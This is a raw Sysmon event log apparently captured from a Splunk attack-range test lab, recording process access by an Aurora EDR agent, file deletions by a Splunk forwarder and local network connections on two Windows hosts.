12:18:34.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.763{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.742{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.741{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.224{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.223{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000040744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.087{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32E09995B2604F7E4372B3153FEB828D,SHA256=7103FFFA03AAB4F950AD03B327969D53194E51DE8C6EA6848C28870EC120B72D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015589Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:35.992{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CD38B0C0C47D4BE34EB64886D82D6A8,SHA256=77ECFF2D6F8423AA44C0AAA944708066BC33112F571D1CBBD335A3209781A69F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:35.150{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F2BC6AA0B0A06DE89A08DDF2EEFECE3,SHA256=59C0D5BF749F937FFF7C91D986B6B2901355A9C63C6BB77F853DE1D0FFE5D12D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000040769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.865{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local138netbios-dgm 354300x800000000000000040768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.865{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x800000000000000015588Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:35.461{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA0961F8A9FBA72D3D7F0CA2E0C1C316,SHA256=1A2C1AE4CA07E7677A0B0C9F28AAAFEACBEF67954B20FB16B6270C63E5A3B7EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:36.215{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5569E65D7C6BC1B4CA769667192BD15B,SHA256=D30A9EA19DAD050DE7EA6E93DC7B8FDE60795461B92A4D7F01A33370E51D0307,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:37.309{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E38D2ECC0BA3398C3324D1F225E8D25,SHA256=8053ACD97DA636D6EA72807363C8B0EBB3C0C1391C69090551A70392D17F61A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015590Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:37.070{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84031B8714F7E68E1FFAF44A1CFDA2A4,SHA256=DFEC31759A94FB9D39B7AD5EA167FF11DB552D515B80CAF6C4B07EC70A5BE6AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.589{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56251-false10.0.1.12-8000- 23542300x800000000000000040774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:38.392{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDC7CDAB5FCD785CA57AE056A40ED204,SHA256=681BF8F0B3DA5D9A2E1BDFDFDCDD2336BD5F3D2E82AE4511A561B61B2C03A0AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015591Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:38.153{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68F82984348E195E5890F1C63B47D332,SHA256=B3369465D9ACBB4C4079F3E848FC0241EF3AD33CC192D43F53C78BC413ED7240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:39.471{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B297602E981436F3EBFF4E9760F9821,SHA256=C9ECA56855471DB38F3EC7BA3CA957A487445F231BEA4E3ACB9779B1C27CA2E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015592Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:39.276{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40BEE6CBA0434F919FE1FE37BD4933EE,SHA256=E52F1C0E6B4F5EDFAEA0E9175818A202FCE5477B51911D2AAF5DCA831B8A4277,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:40.544{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3EE4AF88F5CB13DBC400CAF8AF3EDA1,SHA256=F4598EFAEF6AF3B3848C1F309AE08DE6FD4B55FCF8648B869BEA9DD9B81A8A7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015594Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:40.370{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4C35B653699954C3FDDF0325C35C598,SHA256=D083AFF951F81B85169A95AD6550D9708D8E36EB3DDD79B3D1C750F4D2388FA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015593Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:38.017{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50056-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000040778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:41.632{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=212906034002DD4D9914A7A91EA11F8E,SHA256=7B2E87DA883FC392A8849A7C392C207627DC91F7B7D034715C8CFCD6A105BC83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:41.580{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-039MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015595Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:41.448{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA01814E29FBB9D14DD6BBBB9DE02FEA,SHA256=D991AB952474895465C01CA852FF7FFA39769AF6B9E111E1A13AB3388F708F5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015627Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.761{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015626Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.758{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015625Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015624Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.753{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 